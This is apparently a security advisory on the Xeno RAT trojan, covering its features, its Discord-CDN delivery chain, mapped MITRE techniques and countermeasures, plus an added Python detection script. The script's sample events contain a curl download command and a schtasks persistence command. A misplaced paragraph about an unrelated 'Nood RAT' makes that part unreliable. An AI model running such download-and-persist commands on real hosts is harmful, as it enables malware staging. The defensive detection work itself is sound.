Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub


VTA-004476 – Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

A sophisticated remote access trojan (RAT) named Xeno RAT has surfaced on GitHub, where it is available to other parties free of charge. Written in C# and compatible with Windows 10 and Windows 11, this open-source RAT offers a wide array of functions for remote system management, according to its developer, who goes by moom825. Its capabilities include a SOCKS5 reverse proxy, real-time audio recording, and a hidden virtual network computing (hVNC) module reminiscent of DarkVNC, which gives attackers remote access to compromised computers.

According to a recent report by cybersecurity firm Cyfirma, Xeno RAT has been distributed via the Discord content delivery network (CDN), underscoring the growing trend of accessible, cost-free malware driving a surge in RAT-centric campaigns. Cyfirma noted, “The primary transmission method involves a disguised shortcut file posing as a WhatsApp screenshot, functioning as a downloader. This downloader retrieves a ZIP archive from Discord CDN, unpacks it, and executes the subsequent stage payload.” The multi-stage process uses DLL side-loading to launch a malicious DLL, while also establishing persistence and evading analysis and detection mechanisms.

Described as a backdoor malware, Nood RAT is capable of executing commands received from its command and control (C&C) server to carry out malicious activities, including downloading malicious files, stealing internal system files, and executing commands. Despite its simple appearance, researchers highlight that Nood RAT has encryption features to evade network packet detection and can execute commands from threat actors for various malicious operations.


Attack Surfaces:
Endpoint, Web Application, Web Browser

Command and Control, Defense Evasion, Discovery, Execution, Persistence

T1059.003 – Windows Command Shell,
T1053.005 – Scheduled Task,
T1204.001 – Malicious Link,
T1204.002 – Malicious File,
T1622 – Debugger Evasion,
T1497 – Virtualization/Sandbox Evasion,
T1055 – Process Injection,
T1071.001 – Web Protocols

Indicator of Compromise:


SuperPRO’s Threat Countermeasures Procedures: 
1. Employ threat intelligence measures proactively to counteract the risks posed by the Xeno RAT malware.
2. Utilize robust endpoint security solutions, such as antimalware security suites and host-based intrusion prevention systems, for real-time monitoring and threat detection to safeguard endpoints.
3. Ensure comprehensive protection against compromise by continuously monitoring network activity using NIDS/NIPS and implementing a web application firewall to filter/block suspicious activities, particularly those involving encrypted payloads.
4. Configure firewalls to prevent outbound communication to known malicious IP addresses and domains associated with Xeno RAT command and control servers.
5. Implement behavior-based monitoring to identify unusual activity patterns, such as suspicious processes attempting unauthorized network connections.
6. Employ application whitelisting to restrict endpoint executions to approved applications, thus preventing unauthorized or malicious executables from running.
7. Regularly conduct vulnerability assessments and penetration testing to identify and address security vulnerabilities, followed by appropriate remediation procedures.
8. Establish baseline security procedures and organizational security policies using security benchmarks.
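
One way to apply the behavior-based monitoring in item 5 to the delivery chain described above, as an added example that is not part of the original advisory or the Cyfirma report: it correlates a command shell downloading from the Discord CDN with a scheduled-task creation on the same host shortly afterwards (T1059.003 followed by T1053.005). The event fields, the sample events, the 10-minute window and the function names are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

DISCORD_CDN = "cdn.discordapp.com"      # Discord's attachment CDN host
SHELLS = {"cmd.exe", "powershell.exe"}
WINDOW = timedelta(minutes=10)          # assumed correlation window

# Constructed process-creation events: (timestamp, host, image, command line).
EVENTS = [
    ("2024-03-01T09:00:05", "ws01", "cmd.exe",
     r"cmd.exe /c curl -s -o %TEMP%\img.zip https://cdn.discordapp.com/attachments/1/2/img.zip"),
    ("2024-03-01T09:00:40", "ws01", "schtasks.exe",
     r"schtasks.exe /Create /SC MINUTE /TN Updater /TR C:\Users\a\AppData\Roaming\app.exe"),
    ("2024-03-01T09:05:00", "ws02", "chrome.exe",
     r"chrome.exe https://cdn.discordapp.com/attachments/1/2/cat.png"),
    ("2024-03-01T11:00:00", "ws03", "schtasks.exe",
     r"schtasks.exe /Create /SC DAILY /TN Backup /TR C:\Tools\backup.exe"),
]

def classify(image, cmdline):
    """Return a behaviour tag for one process-creation event, or None."""
    low = cmdline.lower()
    if image.lower() in SHELLS and DISCORD_CDN in low:
        return "shell_cdn_fetch"        # shell process pulling from the Discord CDN
    if image.lower() == "schtasks.exe" and "/create" in low:
        return "task_create"            # scheduled-task persistence (T1053.005)
    return None

def correlate(events, window=WINDOW):
    """Alert when a shell CDN fetch is followed by task creation on the same host."""
    fetches, alerts = {}, []
    for ts, host, image, cmdline in sorted(events):   # ISO timestamps sort in time order
        when = datetime.fromisoformat(ts)
        tag = classify(image, cmdline)
        if tag == "shell_cdn_fetch":
            fetches[host] = when
        elif tag == "task_create" and host in fetches and when - fetches[host] <= window:
            alerts.append((host, ts))
    return alerts

if __name__ == "__main__":
    for host, ts in correlate(EVENTS):
        print(f"ALERT {host}: shell download from Discord CDN, then scheduled task at {ts}")
```

Browser traffic to the CDN (ws02) and a lone administrative task (ws03) do not alert on their own; only the sequence on ws01 does.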

Contributed by: Zahirul